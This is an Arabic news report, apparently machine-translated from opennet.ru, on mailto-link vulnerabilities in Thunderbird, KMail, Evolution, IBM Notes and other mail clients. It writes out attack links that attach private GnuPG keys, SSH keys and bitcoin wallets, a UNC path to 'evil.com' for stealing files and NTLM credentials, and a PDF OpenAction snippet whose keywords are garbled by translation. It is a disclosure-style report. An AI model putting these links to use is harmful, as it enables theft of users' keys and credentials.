باحثون من جامعة الرور بوخوم (ألمانيا)
روابط «
كان عملاء البريد Thunderbird وGNOME Evolution (CVE-2020-11879) وKDE KMail (CVE-2020-11880) وIBM/HCL Notes (CVE-2020-4089) وPegasus Mail عرضة لهجوم بسيط يسمح لك بإرفاق البريد تلقائيًا أي ملف محلي، يتم تحديده عبر رابط مثل "mailto:?attach=path_to_file". يتم إرفاق الملف دون عرض تحذير، لذلك بدون اهتمام خاص، قد لا يلاحظ المستخدم أنه سيتم إرسال الرسالة مع مرفق.
على سبيل المثال، باستخدام رابط مثل "mailto:[البريد الإلكتروني محمي]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" يمكنك إدراج مفاتيح خاصة من GnuPG في الرسالة. يمكنك أيضًا إرسال محتويات محافظ العملات المشفرة (~/.bitcoin/wallet.dat)، ومفاتيح SSH (~/.ssh/id_rsa) وأي ملفات يمكن للمستخدم الوصول إليها. علاوة على ذلك، يسمح لك Thunderbird بإرفاق مجموعات من الملفات عن طريق القناع باستخدام بنيات مثل "attach=/tmp/*.txt".
بالإضافة إلى الملفات المحلية، يقوم بعض عملاء البريد الإلكتروني بمعالجة الروابط إلى مساحة تخزين الشبكة والمسارات في خادم IMAP. على وجه الخصوص، يتيح لك IBM Notes نقل ملف من دليل الشبكة عند معالجة روابط مثل "attach=\\evil.com\dummyfile"، بالإضافة إلى اعتراض معلمات مصادقة NTLM عن طريق إرسال رابط إلى خادم SMB يتحكم فيه المهاجم (سيتم إرسال الطلب مع مستخدم معلمات المصادقة الحالية).
يعالج Thunderbird طلبات مثل "attach=imap:///fetch>UID>/INBOX>1/" بنجاح، مما يسمح لك بإرفاق محتوى من المجلدات الموجودة على خادم IMAP. وفي الوقت نفسه، يتم فك تشفير الرسائل المستردة من IMAP، والمشفرة عبر OpenPGP وS/MIME، تلقائيًا بواسطة عميل البريد قبل إرسالها. كان مطورو Thunderbird
كانت الإصدارات القديمة من Thunderbird أيضًا عرضة لنوعين آخرين من الهجمات على PGP وS/MIME التي اقترحها الباحثون. على وجه الخصوص، تعرض Thunderbird، بالإضافة إلى OutLook وPostBox وeM Client وMailMate وR2Mail2، لهجوم استبدال المفتاح، بسبب حقيقة أن عميل البريد يقوم تلقائيًا باستيراد وتثبيت الشهادات الجديدة المرسلة في رسائل S/MIME، مما يسمح المهاجم لتنظيم استبدال المفاتيح العامة المخزنة بالفعل من قبل المستخدم.
الهجوم الثاني، الذي يتعرض له كل من Thunderbird وPostBox وMailMate، يتلاعب بميزات آلية الحفظ التلقائي لمسودات الرسائل ويسمح، باستخدام معلمات mailto، ببدء فك تشفير الرسائل المشفرة أو إضافة توقيع رقمي للرسائل العشوائية، مع الإرسال اللاحق للنتيجة إلى خادم IMAP الخاص بالمهاجم. في هذا الهجوم، يتم إرسال النص المشفر من خلال معلمة "النص الأساسي"، ويتم استخدام علامة "تحديث التعريف" لبدء اتصال بخادم IMAP الخاص بالمهاجم. على سبيل المثال: ' '
لمعالجة روابط "mailto:" تلقائيًا دون تدخل المستخدم، يمكن استخدام مستندات PDF مصممة خصيصًا - يتيح لك إجراء OpenAction في PDF تشغيل معالج mailto تلقائيًا عند فتح مستند:
%PDF-1.5
1 0 كائن
<< /اكتب /كتالوج /OpenAction [2 0 R] >>
إندوبج
2 0 كائن
<< /النوع /الإجراء /S /URI/URI (mailto:?body=——بدء رسالة PGP ——[…])>>
إندوبج
المصدر: opennet.ru